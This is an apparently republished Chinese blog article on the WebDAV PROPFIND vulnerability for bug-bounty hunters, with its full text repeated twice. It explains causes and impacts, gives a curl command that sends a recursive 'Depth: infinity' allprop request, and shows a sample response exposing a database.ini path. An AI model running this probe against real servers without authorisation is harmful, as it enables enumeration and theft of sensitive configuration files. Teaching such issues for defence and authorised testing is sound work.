admin管理员组

文章数量:1032982

SRC 小漏洞

PROPFIND 漏洞是与 WebDAV(Web Distributed Authoring and Versioning) 协议相关的一种安全漏洞,主要涉及 HTTP 方法 PROPFIND 的不当实现或配置。

PROPFIND 漏洞的原理

漏洞通常由以下原因引发:

  • 不安全的配置服务器未正确限制 PROPFIND 方法的访问权限。
  • 目录遍历漏洞攻击者可能通过 PROPFIND 请求访问本应受限的目录或文件(例如通过 Depth: infinity 参数递归遍历目录)。
  • 信息泄露服务器可能通过 PROPFIND 响应返回敏感信息(如内部文件路径、系统配置等)。
  • 拒绝服务(DoS)攻击者可能发送大量复杂的 PROPFIND 请求,导致服务器资源耗尽。

漏洞的影响

  • 敏感信息泄露攻击者可获取服务器上的文件列表、目录结构或其他元数据。
  • 权限绕过通过遍历目录访问受限文件(如配置文件、日志文件)。
  • 服务器入侵结合其他漏洞(如文件上传漏洞),可能导致远程代码执行(RCE)。
  • 服务中断通过 DoS 攻击使服务器无法响应正常请求。

示例

代码语言:javascript代码运行次数:0运行复制
curl -X PROPFIND / -H "Depth: infinity" -H "Content-Type: text/xml" --data '<D:propfind xmlns:D="DAV:"><D:allprop/></D:propfind>'
  • Depth: infinity表示递归遍历所有子目录。
  • <D:allprop/>请求返回所有文件属性。

如果服务器配置不当,可能返回类似以下信息:

代码语言:javascript代码运行次数:0运行复制
<D:multistatus xmlns:D="DAV:">
  <D:response>
    <D:href>/webdav/</D:href>
    <D:propstat>
      <D:prop>
        <D:displayname>webdav</D:displayname>
        <D:getlastmodified>Fri, 01 Jan 2023 00:00:00 GMT</D:getlastmodified>
      </D:prop>
      <D:status>HTTP/1.1 200 OK</D:status>
    </D:propstat>
  </D:response>
  <D:response>
    <D:href>/webdav/config/</D:href>
    <D:propstat>
      <D:prop>
        <D:displayname>config</D:displayname>
      </D:prop>
      <D:status>HTTP/1.1 200 OK</D:status>
    </D:propstat>
  </D:response>
  <D:response>
    <D:href>/webdav/config/database.ini</D:href>
    <D:propstat>
      <D:prop>
        <D:displayname>database.ini</D:displayname>
      </D:prop>
      <D:status>HTTP/1.1 200 OK</D:status>
    </D:propstat>
  </D:response>
</D:multistatus>
  • 攻击者通过响应发现了 /webdav/config/database.ini 文件路径。攻击者可以直接下载该文件。
本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。原始发表:2025-04-03,如有侵权请联系 cloudcommunity@tencent 删除src遍历递归服务器漏洞

SRC 小漏洞

PROPFIND 漏洞是与 WebDAV(Web Distributed Authoring and Versioning) 协议相关的一种安全漏洞,主要涉及 HTTP 方法 PROPFIND 的不当实现或配置。

PROPFIND 漏洞的原理

漏洞通常由以下原因引发:

  • 不安全的配置服务器未正确限制 PROPFIND 方法的访问权限。
  • 目录遍历漏洞攻击者可能通过 PROPFIND 请求访问本应受限的目录或文件(例如通过 Depth: infinity 参数递归遍历目录)。
  • 信息泄露服务器可能通过 PROPFIND 响应返回敏感信息(如内部文件路径、系统配置等)。
  • 拒绝服务(DoS)攻击者可能发送大量复杂的 PROPFIND 请求,导致服务器资源耗尽。

漏洞的影响

  • 敏感信息泄露攻击者可获取服务器上的文件列表、目录结构或其他元数据。
  • 权限绕过通过遍历目录访问受限文件(如配置文件、日志文件)。
  • 服务器入侵结合其他漏洞(如文件上传漏洞),可能导致远程代码执行(RCE)。
  • 服务中断通过 DoS 攻击使服务器无法响应正常请求。

示例

代码语言:javascript代码运行次数:0运行复制
curl -X PROPFIND / -H "Depth: infinity" -H "Content-Type: text/xml" --data '<D:propfind xmlns:D="DAV:"><D:allprop/></D:propfind>'
  • Depth: infinity表示递归遍历所有子目录。
  • <D:allprop/>请求返回所有文件属性。

如果服务器配置不当,可能返回类似以下信息:

代码语言:javascript代码运行次数:0运行复制
<D:multistatus xmlns:D="DAV:">
  <D:response>
    <D:href>/webdav/</D:href>
    <D:propstat>
      <D:prop>
        <D:displayname>webdav</D:displayname>
        <D:getlastmodified>Fri, 01 Jan 2023 00:00:00 GMT</D:getlastmodified>
      </D:prop>
      <D:status>HTTP/1.1 200 OK</D:status>
    </D:propstat>
  </D:response>
  <D:response>
    <D:href>/webdav/config/</D:href>
    <D:propstat>
      <D:prop>
        <D:displayname>config</D:displayname>
      </D:prop>
      <D:status>HTTP/1.1 200 OK</D:status>
    </D:propstat>
  </D:response>
  <D:response>
    <D:href>/webdav/config/database.ini</D:href>
    <D:propstat>
      <D:prop>
        <D:displayname>database.ini</D:displayname>
      </D:prop>
      <D:status>HTTP/1.1 200 OK</D:status>
    </D:propstat>
  </D:response>
</D:multistatus>
  • 攻击者通过响应发现了 /webdav/config/database.ini 文件路径。攻击者可以直接下载该文件。
本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。原始发表:2025-04-03,如有侵权请联系 cloudcommunity@tencent 删除src遍历递归服务器漏洞

本文标签: SRC 小漏洞

版权声明:本文标题:SRC 小漏洞 内容由热心网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:http://it.en369.cn/jiaocheng/1747985785a2237650.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。